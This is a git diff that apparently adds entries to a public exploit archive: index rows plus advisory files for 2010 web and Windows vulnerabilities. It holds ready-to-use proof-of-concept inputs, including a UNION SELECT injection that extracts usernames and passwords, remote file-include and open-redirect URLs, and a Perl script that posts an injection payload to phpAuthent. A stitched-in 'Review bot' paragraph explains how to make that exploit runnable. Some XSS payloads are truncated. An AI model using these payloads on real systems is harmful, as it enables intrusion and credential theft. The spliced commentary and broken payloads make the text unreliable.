diff --git a/files.csv b/files.csv
index 9100cd453..061d70016 100755
--- a/files.csv
+++ b/files.csv
@@ -30400,6 +30400,7 @@ id,file,description,date,author,platform,type,port
 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
 33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0
+33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution Vulnerability",2010-03-06,Secumania,windows,remote,0
 33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0
 33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption Vulnerability",2010-03-11,wushi,linux,remote,0
 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection Vulnerability",2010-03-12,Pr0T3cT10n,php,webapps,0
@@ -30418,6 +30419,7 @@ id,file,description,date,author,platform,type,port
 33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component 'catid' Parameter SQL Injection Vulnerability",2010-03-16,N2n-Hacker,php,webapps,0
 33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking Vulnerability",2010-03-14,metasploit,novell,remote,0
 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 'langname' Parameter Local File Include Vulnerability",2010-03-17,7Safe,php,webapps,0
+33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption Vulnerability",2010-03-17,ITSecTeam,windows,dos,0
 33771,platforms/php/webapps/33771.txt,"Joomla! 'com_alert' Component 'q_item' Parameter SQL Injection Vulnerability",2010-03-17,N2n-Hacker,php,webapps,0
 33772,platforms/php/webapps/33772.txt,"phpBB2 Plus 1.53 'kb.php' SQL Injection Vulnerability",2010-03-17,Gamoscu,php,webapps,0
 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 'admin.html' Multiple SQL Injection Vulnerabilities",2010-03-18,blake,php,webapps,0
@@ -30426,3 +30428,13 @@ id,file,description,date,author,platform,type,port
 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 'detail.php' Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-18,d3v1l,php,webapps,0
 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 Multiple Cross Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0
 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 GET Request Format String Denial Of Service Vulnerability",2010-03-20,Rick2600,windows,dos,0
+33779,platforms/jsp/webapps/33779.txt,"agXchange ESM 'ucschcancelproc.jsp' Open Redirection Vulnerability",2010-03-22,Lament,jsp,webapps,0
+33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x 'names.nsf' Cross Site Scripting Vulnerability",2010-03-19,Lament,multiple,remote,0
+33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla <= 1.1.10 'definitions.php' Multiple Remote File Include Vulnerabilities",2010-03-23,eidelweiss,php,webapps,0
+33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x 'b-day.php' Addon SQL Injection Vulnerability",2010-03-22,n3w7u,php,webapps,0
+33783,platforms/linux/remote/33783.txt,"Astaro Security Linux 5 'index.fpl' Cross-Site Scripting Vulnerability",2010-03-23,"Vincent Hautot",linux,remote,0
+33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 Search Cross Site Scripting Vulnerability",2010-03-19,5ubzer0,php,webapps,0
+33785,platforms/jsp/webapps/33785.txt,"agXchange ESM 'ucquerydetails.jsp' Cross Site Scripting Vulnerability",2010-03-23,Lament,jsp,webapps,0
+33786,platforms/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",multiple,remote,0
+33787,platforms/php/webapps/33787.txt,"RepairShop2 index.php Prod Parameter XSS",2010-03-23,kaMtiEz,php,webapps,0
+33788,platforms/php/webapps/33788.pl,"phpAuthent 0.2.1 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0
diff --git a/platforms/jsp/webapps/33779.txt b/platforms/jsp/webapps/33779.txt
new file mode 100755
index 000000000..b2925ba10
--- /dev/null
+++ b/platforms/jsp/webapps/33779.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38879/info
+
+agXchange ESM is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+http://www.example.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com
\ No newline at end of file
diff --git a/platforms/jsp/webapps/33785.txt b/platforms/jsp/webapps/33785.txt
new file mode 100755
index 000000000..c3306bf6d
--- /dev/null
+++ b/platforms/jsp/webapps/33785.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38896/info
+
+agXchange ESM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27>
\ No newline at end of file
diff --git a/platforms/linux/remote/33783.txt b/platforms/linux/remote/33783.txt
new file mode 100755
index 000000000..b314d36d5
--- /dev/null
+++ b/platforms/linux/remote/33783.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38893/info
+
+Astaro Security Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Astaro Security Linux 5; other versions may also be affected.
+
+The following example POST data is available:
+
+username=my@example.com&password=DTC&SID=>">&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0
+
diff --git a/platforms/multiple/remote/33780.txt b/platforms/multiple/remote/33780.txt
new file mode 100755
index 000000000..be8e42d89
--- /dev/null
+++ b/platforms/multiple/remote/33780.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38880/info
+
+
+IBM Lotus Notes is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Lotus Notes 6.x is vulnerable; other versions may also be affected.
+
+http://www.example.com/names.nsf/
\ No newline at end of file
diff --git a/platforms/multiple/remote/33786.txt b/platforms/multiple/remote/33786.txt
new file mode 100755
index 000000000..699704eba
--- /dev/null
+++ b/platforms/multiple/remote/33786.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38897/info
+
+Cafu is prone to a remote NULL pointer dereference vulnerability and a remote client format string vulnerability.
+
+Successful exploits may allow an attacker to execute arbitrary code within the context of the affected application or crash the affected application, resulting in a denial-of-service condition.
+
+Cafu 9.06 and prior are vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/33786.zip
\ No newline at end of file
diff --git a/platforms/php/webapps/33781.txt b/platforms/php/webapps/33781.txt
new file mode 100755
index 000000000..e04a931a6
--- /dev/null
+++ b/platforms/php/webapps/33781.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38889/info
+
+Vanilla is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+
+Vanilla 1.1.10 and prior versions are vulnerable.
+
+http://www.example.com/PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
+http://www.example.com/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]
\ No newline at end of file
diff --git a/platforms/php/webapps/33782.txt b/platforms/php/webapps/33782.txt
new file mode 100755
index 000000000..cef8adbea
--- /dev/null
+++ b/platforms/php/webapps/33782.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38891/info
+
+PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1--
\ No newline at end of file
diff --git a/platforms/php/webapps/33784.txt b/platforms/php/webapps/33784.txt
new file mode 100755
index 000000000..528eb0d6f
--- /dev/null
+++ b/platforms/php/webapps/33784.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38895/info
+
+vBulletin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBulletin 4.0.2 is vulnerable. This issue does not affect vBulletin 3.x versions.
+
+The following example URIs are available:
+
+http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">
+
+http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33787.txt b/platforms/php/webapps/33787.txt
new file mode 100755
index 000000000..1650917fe
--- /dev/null
+++ b/platforms/php/webapps/33787.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/38907/info
+
+RepairShop 2 is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+RepairShop 2 1.9.023 Trial is vulnerable; other versions may also be affected.
+
+#############################################################################################################
+## RepairShop2 - cross site scripting ( XSS ) ##
+## Author : kaMtiEz (kamzcrew@yahoo.com) ##
+## Homepage : http://www.indonesiancoder.com ##
+## Date : 20 March, 2010 ##
+#############################################################################################################
+
+[ Software Information ]
+
+[+] Vendor : http://www.realitymedias.com/
+[+] Download : http://www.realitymedias.com/repairshop/?L=downloads
+[+] version : 1.9.023
+[+] Vulnerability : XSS
+[+] Dork : syalalala
+[+] LOCATION : INDONESIA - JOGJA
+#############################################################################################################
+
+[ Vulnerable File ]
+
+http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER]
+
+[ EXPLOIT ]
+
+">
+
+[ DEMO ]
+
+http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod=">
+
+[ FIX ]
+
+:(
+
+
+#############################################################################################################
+
+[ Thx TO ]
+
+[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
+[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
+[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
+[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31
+
+
+[ NOTE ]
+
+[+] Babe enyak adek i love u 
pull dah ..
+[+] to someone .. satu langkah lagi .. :D
+[+] CS-31 : kutunggu di kotaku :">
+
+[ QUOTE ]
+
+[+] INDONESIANCODER still r0x
+[+] nothing secure ..
+
+
diff --git a/platforms/php/webapps/33788.pl b/platforms/php/webapps/33788.pl
new file mode 100755
index 000000000..e16312c2c
--- /dev/null
+++ b/platforms/php/webapps/33788.pl
@@ -0,0 +1,66 @@
+source: http://www.securityfocus.com/bid/38908/info
+
+
+phpAuthent is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+phpAuthent 0.2.1 is vulnerable; other versions may also be affected.
+
+# Exploit Title: phpAuthentAdmin permanent XSS
+# Date: 2010-03-21
+# Author: Yoyahack
+# Software Link: http://sourceforge.net/projects/phpauth/files/phpAuthent/phpAuthent%200.2.1/phpAuthent-0.2.1-20050828-116.zip/download
+# Version: 0.2.1
+# Tested on: linux
+
+#Exploit:
+
+#!/usr/bin/perl
+#Autor: Yoyahack
+#Web: http://undersecurity.net
+#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+#Source
+
+print q(---------------------------------
+Autor: Yoyahack
+Web: http://undersecurity.net
+Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
+---------------------------------
+);
+
+if(!$ARGV[0]){
+print "Insert web\n";
+print "Ex: www.webpage.com\n";
+exit;
+}
+
+$xss = qq();
+my $ua = new LWP::UserAgent;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)".
+"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");
+
+$response = $ua->request(
+ POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create",
+ {
+ action => 'changerealname',
+ name => $xss,
+ action => 'rename',
+ login => 'aaa',
+ action=> 'password',
+ password => 'XSS',
+ action => 'changeemail',
+ email => 'XSS',
+ },
+'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6',
+);
+$loc = 'index.php?msg=001';
+if($loc eq $response->header('location')){
+print "\n\nExploit send!\n";
+exit;
+}
+print "\n\nExploit Faield\n";
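Review bot: The `source:` line and the three advisory paragraphs that precede the `# Exploit Title:` block are not comments, so the file committed as `33788.pl` does not parse as Perl until a reader strips that header by hand; prefixing those lines with `#` (or moving them below `__END__`) would keep the advisory text and leave the script runnable. Below `use HTTP::Request::Common;` the script declares neither `use strict;` nor `use warnings;`, which leaves `$xss`, `$response` and `$loc` as undeclared globals and lets `if($loc eq $response->header('location'))` compare silently against an empty string when the reply carries no Location header at all. `my $ua = new LWP::UserAgent;` is the indirect-object form and is better written `my $ua = LWP::UserAgent->new;`, and the final message misspells its own outcome (`Exploit Faield`). The `PHPSESSID=...` value passed in the `'Cookie'` header is a fixed literal tied to the author's own session and should be marked as a placeholder in a comment rather than left as if it were meaningful.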
diff --git a/platforms/windows/dos/33770.txt b/platforms/windows/dos/33770.txt
new file mode 100755
index 000000000..ffff7252b
--- /dev/null
+++ b/platforms/windows/dos/33770.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38790/info
+
+Microsoft Windows Media Player is prone to a remote memory-corruption vulnerability when handling specially crafted AVI files.
+
+An attacker can exploit this issue by enticing an unsuspecting user to open a malicious file with the vulnerable application. A successful exploit may allow arbitrary code to run in the context of the currently logged-in user.
+
+Windows Media Player 11 is vulnerable; other versions may also be affected.
+
+UPDATE (Mar 19, 2010): The vendor has not been able to replicate this issue. Pending further investigation, this BID will be updated and possibly retired.
+
+http://www.exploit-db.com/sploits/33770.avi.gz
\ No newline at end of file
diff --git a/platforms/windows/remote/33750.txt b/platforms/windows/remote/33750.txt
new file mode 100755
index 000000000..c9eeb596b
--- /dev/null
+++ b/platforms/windows/remote/33750.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38661/info
+
+Microsoft Windows is prone to a remote command-execution vulnerability because it opens help files from unsafe locations.
+
+An attacker could exploit this issue by enticing a victim to load help files when working in a directory containing crafted '.chm' files.
+
+Windows 2000 and XP are vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/33750.zip
\ No newline at end of file